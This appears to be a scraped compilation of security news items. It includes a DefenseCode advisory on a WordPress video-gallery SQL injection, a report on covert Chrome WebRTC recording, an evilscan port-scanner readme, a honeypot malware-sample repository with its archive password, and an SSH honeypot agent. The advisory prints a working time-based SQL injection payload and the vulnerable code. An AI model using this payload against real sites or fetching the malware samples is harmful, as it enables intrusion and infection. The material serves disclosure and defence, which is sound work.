WordPress Huge-IT Video Gallery plugin version 2.0.4 suffers from a remote SQL injection vulnerability. DefenseCode ThunderScan SAST Advisory WordPress Huge-IT Video Gallery Plugin Security Vulnerability Advisory ID: DC-2017-01-009 Advisory Title: WordPress Huge-IT Video Gallery plugin SQL injection vulnerability Advisory URL: http://www.defensecode.com/advisories.php Software: WordPress Huge-IT Video Gallery plugin Language: PHP Version: 2.0.4 and below Vendor Status: Vendor contacted, update released Release Date: 2017/05/24 Risk: High 1. General Overview =================== During the security audit of Huge-IT Video Gallery plugin for WordPress CMS, security vulnerability was discovered using DefenseCode ThunderScan application source code security analysis platform. More information about ThunderScan is available at URL: http://www.defensecode.com 2. Software Overview ==================== According to the developers, Gallery Video plugin was created and specifically designed to show video links in unusual splendid gallery types supplemented of many gallery options. According to wordpress.org, it has more than 40,000 active installs. Homepage: https://wordpress.org/plugins/gallery-video/ http://huge-it.com/wordpress-video-gallery/ 3. Vulnerability Description ================================== During the security analysis, ThunderScan discovered SQL injection vulnerability in Huge-IT Video Gallery WordPress plugin. The easiest way to reproduce the vulnerability is to visit the provided URL while being logged in as administrator or another user that is authorized to access the plugin settings page. Users that do not have full administrative privileges could abuse the database access the vulnerability provides to either escalate their privileges or obtain and modify database contents they were not supposed to be able to. Due to the missing nonce token, the attacker the vulnerable code is also directly exposed to attack vectors such as Cross Site request forgery (CSRF). 3.1 SQL injection Vulnerable Function: $wpdb->get_var( $query ); Vulnerable Variable: $_POST['cat_search'] Vulnerable URL: http://www.vulnerablesite.com/wp-admin/admin.php?page=video_galleries_huge_it_video_gallery Vulnerable Body: cat_search=DefenseCode AND (SELECT * FROM (SELECT(SLEEP(5)))DC) File: gallery-video\includes\admin\class-gallery-video-galleries.php --------- 107 $cat_id = sanitize_text_field( $_POST['cat_search'] ); ... 118 $where .= " AND sl_width=" . $cat_id; ... 127 $query = "SELECT COUNT(*) FROM " . $wpdb->prefix . "huge_it_videogallery_galleries" . $where; 128 $total = $wpdb->get_var( $query ); --------- 4. Solution =========== Vendor resolved the security issues. All users are strongly advised to update WordPress Huge-IT Video Gallery plugin to the latest available version. 5. Credits ========== Discovered with DefenseCode ThunderScan Source Code Security Analyzer by Neven Biruski. 6. Disclosure Timeline ====================== 2017/03/31 Vendor contacted 2017/04/06 Vendor responded 2017/05/24 Advisory released to the public 7. About DefenseCode ==================== DefenseCode L.L.C. delivers products and services designed to analyze and test web, desktop and mobile applications for security vulnerabilities. DefenseCode ThunderScan is a SAST (Static Application Security Testing, WhiteBox Testing) solution for performing extensive security audits of application source code. ThunderScan SAST performs fast and accurate analyses of large and complex source code projects delivering precise results and low false positive rate. DefenseCode WebScanner is a DAST (Dynamic Application Security Testing, BlackBox Testing) solution for comprehensive security audits of active web applications. WebScanner will test a website's security by carrying out a large number of attacks using the most advanced techniques, just as a real attacker would. Subscribe for free software trial on our website http://www.defensecode.com/ . E-mail: defensecode[at]defensecode.com Website: http://www.defensecode.com Twitter: https://twitter.com/DefenseCode/ Authored by DefenseCode, Neven Biruski https://packetstormsecurity.com/files/142705/WordPress-Huge-IT-Video-Gallery-2.0.4-SQL-Injection.html

What if your laptop is listening to everything that is being said during your phone calls or other people near your laptop and even recording video of your surrounding without your knowledge? Sounds really scary! Isn't it? But this scenario is not only possible but is hell easy to accomplish. A UX design flaw in the Google's Chrome browser could allow malicious websites to record audio or video without alerting the user or giving any visual indication that the user is being spied on. AOL developer Ran Bar-Zik reported the vulnerability to Google on April 10, 2017, but the tech giant declined to consider this vulnerability a valid security issue, which means that there is no official patch on the way. How Browsers Works With Camera & Microphone Before jumping onto vulnerability details, you first need to know that web browser based audio-video communication relies on WebRTC (Web Real-Time Communications) protocol – a collection of communications protocols that is being supported by most modern web browsers to enable real-time communication over peer-to-peer connections without the use of plugins. However, to protect unauthorised streaming of audio and video without user's permission, the web browser first request users to explicitly allow websites to use WebRTC and access device camera/microphone. Once granted, the website will have access to your camera and microphone forever until you manually revoke WebRTC permissions. In order to prevent 'authorised' websites from secretly recording your audio or video stream, web browsers indicate their users when any audio or video is being recorded. "Activating this API will alert the user that the audio or video from one of the devices is being captured," Bar-Zik wrote on a Medium blog post. "This record indication is the last and the most important line of defense." In the case of Google Chrome, a red dot icon appears on the tab, alerting users that the audio or video streaming is live. How Websites Can Secretly Spy On You The researcher discovered that if any authorised website pop-ups a headless window using a JavaScript code, it can start recording audio and video secretly, without the red dot icon, giving no indications in the browser that the streaming is happening. This happens because Chrome has not been designed to display a red-dot indication on headless windows, allowing site developers to "exploit small UX manipulation to activate the MediaRecorder API without alerting the users." Bar-Zik also provided a proof-of-concept (PoC) code for anyone to download, along with a demo website that asks the user for permission to use WebRTC, launches a pop-up, and then records 20 seconds of audio without giving any visual indication. All you need to do is click on two buttons to allow the website to use WebRTC in the browser. The demo records your audio for 20 seconds and then provides you a download link for the recorded file. The reported flaw affects Google Chrome, but it may affect other web browsers as well. It's Not A Flaw, Says Google; So No Quick Patch! Bar-Zik reported the security issue to Google on April 10, 2017, but the company doesn't consider this as a valid security vulnerability. However, it agrees to find ways to "improve the situation" in the future. Google consider this a security vulnerability or not, but the bug is surely a privacy issue, which could be exploited by hackers to potentially launch more sophisticated attacks. In order to stay on the safer side, simply disable WebRTC which can be done easily if you don't need it. But if you require the feature, allow only trusted websites to use WebRTC and look for any other windows that it may spawn afterward on top of that. Edward Snowden leaks also revealed Optic Nerve – the NSA's project to capture webcam images every 5 minutes from random Yahoo users. In just six months, 1.8 Million users' images were captured and stored on the government servers in 2008. Following such privacy concerns, even Facebook CEO Mark Zuckerberg and former FBI director James Comey admitted that they put tape on their laptops just to be on the safer side. Although putting a tape over your webcam would not stop hackers or government spying agencies from recording your voice, at least, it would prevent them from watching or capturing your live visual feeds. Via thehackernews.com

https://www.dd-wrt.com/wiki/index.php/Captive_Portal

evilscan is a Node.js based massive IP Port scanner designed for concurrency, speed and scanning large ranges of IP addresses. Features Individual IP or IP range scan Individual port, ports list, or port range Banner grabbing (not fully implemented, works with verbose ports only) IAC negotiation Reverse dns Geolocation information Shell or JSON output Optional progress details Usage Usage: evilscan <fqdn|ipv4|cidr> [options] Example: root@debian:~# evilscan 192.168.0.0/24 --port=21-23,80 Options: --port port(s) you want to scan, examples: --port=80 --port=21,22 --port=21,22,23,5900-5902 --reverse display DNS reverse lookup --reversevalid only display results having a valid reverse dns, except if ports specified --geo display geoip (free maxmind) --banner display banner --bannerlen set banner length grabing default 512 --bannerraw display raw banner (as a JSON Buffer) --progress display progress indicator each seconds --status ports status wanted in results (example --status=OT) T(timeout) R(refused) O(open, default) U(unreachable) --scan scan method tcpconnect (full connect, default) tcpsyn (half opened, not yet implemented) udp (not yet implemented) --concurrency max number of simultaneous socket opened default 500 --timeout maximum number of milliseconds before closing the connection default 2000 --display display result format (json,xml,console) default console --json shortcut for --display=json --xml shortcut for --display=xml --console shortcut for --display=console --help display help --about display about --version display version number Sample Output root@debian:~# evilscan 127.0.0.1 --port=0-65535 --banner 127.0.0.1|111||open 127.0.0.1|53||open 127.0.0.1|23|Debian GNU/Linux jessie/sid\r\ndebian login:|open 127.0.0.1|5432||open 127.0.0.1|27017||open 127.0.0.1|28017||open 127.0.0.1|35223||open 127.0.0.1|35491||open 127.0.0.1|39619||open You can download evilscan here: evilscan-master.zip Or read more here. Source

A collection of malware samples caught by several honeypots i manage ATTENTION: This repository contains actual malware, do not execute any of these files on your pc unless you know exactly what you are doing. Content Adylkuzz Allaple Bitcoin miners Downloader-CUZ EternalRocks Generic Trojan Muldrop Pepex Ransomware Rbot SdBot Shodi Virutn Wannacry Wisdomeyes unknown README.md All of the malware samples contained in this repository has been collected by several honeypots installed on different locations all over the world. This is the result of a distributed honeypot project i am developing with the help of all of those who want to collaborate. Malware with a generic name such as MD5 value or smbxxx.tmp were not detected as malware by virustotal at the moment of the upload, but this does not mean it's not malware. please feel free to download, analyze and reverse all the samples in this repository but please let me know the results of your investigation. All 7z and zip files are password protected and the password is "infected" (without quotes). Thanks for you interest. Fabrizio Monaco twitter: @fabrimagic keybase: fabrimagic Download malware-samples.zip Source: github.com

//removed

This is the honeypot agent for running on a server's ssh port. Collection data gets sent to http://sshpot.com/ (or wherever you want - the server/service is also open source ) Done ✓ Log commands used by attackers TODO x Tests Dowload ssh-passwd-honeypot.zip Source: github.com